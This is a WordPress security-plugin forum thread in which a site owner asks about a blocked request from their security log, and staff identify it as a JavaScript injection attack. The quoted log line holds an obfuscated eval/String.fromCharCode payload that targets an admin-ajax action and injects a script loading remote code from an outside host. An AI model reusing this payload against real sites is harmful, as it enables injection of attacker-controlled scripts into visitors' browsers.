Home › Forums › BulletProof Security Pro › Interesting Item on Security Log
- This topic has 2 replies, 2 voices, and was last updated 4 years, 11 months ago by Mike.
-
AuthorPosts
-
MikeParticipant
I have been seeing this frequently in my security log – and it appears like a hack attempt – not sure what it is because I have not seen this in the past. It appears BPS is doing it’s job – however is there a weakness this attempt is trying to exploit?
[403 GET Request: May 21, 2019 - 9:53 am] BPS Pro: 13.9 WP: 5.2 Event Code: WPADMIN-SBR Solution: https://forum.ait-pro.com/forums/topic/security-log-event-codes/ REMOTE_ADDR: 192.99.38.186 Host Name: cp31-ca.under2.net SERVER_PROTOCOL: language=javascript>eval(String.fromCharCode(118, 97, 114, 32, 100, 61, 100, 111, 99, 117, 109, 101, 110, 116, 59, 118, 97, 114, 32, 115, 61, 100, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 32, 10, 115, 46, 116, 121, 112, 101, 61, 39, 116, 101, 120, 116, 47, 106, 97, 118, 97, 115, 99, 114, 105, 112, 116, 39, 59, 10, 115, 46, 97, 115, 121, 110, 99, 61, 116, 114, 117, 101, 59, 10, 118, 97, 114, 32, 112, 108, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 49, 54, 44, 32, 49, 49, 54, 44, 32, 49, 49, 50, 44, 32, 49, 49, 53, 44, 32, 53, 56, 44, 32, 52, 55, 44, 32, 52, 55, 44, 32, 49, 49, 53, 44, 32, 49, 49, 54, 44, 32, 57, 55, 44, 32, 49, 49, 54, 44, 32, 49, 49, 53, 44, 32, 52, 54, 44, 32, 49, 48, 51, 44, 32, 57, 55, 44, 32, 49, 49, 52, 44, 32, 49, 49, 52, 44, 32, 49, 50, 49, 44, 32, 49, 48, 51, 44, 32, 49, 49, 55, 44, 32, 49, 48, 48, 44, 32, 49, 48, 53, 44, 32, 49, 49, 48, 44, 32, 49, 48, 53, 44, 32, 52, 54, 44, 32, 57, 57, 44, 32, 49, 49, 49, 44, 32, 49, 48, 57, 41, 59, 10, 115, 46, 115, 114, 99, 61, 112, 108, 43, 39, 47, 102, 108, 97, 115, 107, 46, 106, 115, 63, 116, 61, 116, 38, 39, 59, 32, 10, 105, 102, 32, 40, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 117, 114, 114, 101, 110, 116, 83, 99, 114, 105, 112, 116, 41, 32, 123, 32, 10, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 117, 114, 114, 101, 110, 116, 83, 99, 114, 105, 112, 116, 46, 112, 97, 114, 101, 110, 116, 78, 111, 100, 101, 46, 105, 110, 115, 101, 114, 116, 66, 101, 102, 111, 114, 101, 40, 115, 44, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 117, 114, 114, 101, 110, 116, 83, 99, 114, 105, 112, 116, 41, 59, 10, 125, 32, 101, 108, 115, 101, 32, 123, 10, 100, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 39, 104, 101, 97, 100, 39, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 115, 41, 59, 10, 125));</script> HTTP/1.1 HTTP_CLIENT_IP: HTTP_FORWARDED: HTTP_X_FORWARDED_FOR: HTTP_X_CLUSTER_CLIENT_IP: REQUEST_METHOD: GET HTTP_REFERER: REQUEST_URI: /wp-admin/admin-ajax.php?action=update_zb_fbc_code&domain=</script><script QUERY_STRING: action=update_zb_fbc_code&domain=</script><script HTTP_USER_AGENT: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0
AITpro AdminKeymasterYep, this is a Header javascript injection attack. BPS logs everything in a plain text file for exactly this reason. BPS does not save or store Security Log fields in your WordPress database for exactly this reason. Nothing to worry about.
MikeParticipantThanks for the quick response. BPS has been great. I experience 200-600 attacks a week (logged) and it has been that way for several years – never had a breach. I wish these folks (or bots) had something better to do.
-
AuthorPosts
- You must be logged in to reply to this topic.